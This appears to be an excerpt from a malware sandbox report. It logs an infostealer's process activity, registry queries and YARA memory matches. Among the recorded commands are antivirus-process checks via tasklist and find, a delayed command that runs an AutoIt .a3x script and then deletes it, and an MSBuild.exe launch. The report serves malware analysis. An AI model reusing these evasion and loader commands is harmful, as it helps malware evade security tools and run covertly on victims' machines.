Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Memory protected: page readonly | page read and write | page write copy | page execute | page execute and read and write | page guard
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Process created: C:\Users\user\Desktop\Reminder.exe "C:\Users\user\Desktop\Reminder.exe" /VERYSILENT
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "wrsa.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "opssvc.exe"
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "avgui.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ping -n 5 127.0.0.1 >nul && updater.exe C:\ProgramData\\ZPrVgH71.a3x && del C:\ProgramData\\ZPrVgH71.a3x
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\coigned\Updater.exe updater.exe C:\ProgramData\\ZPrVgH71.a3x
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

barindex
Source: Yara match File source: 00000029.00000002.2093368871.0000000003E62000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000002.2510265571.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs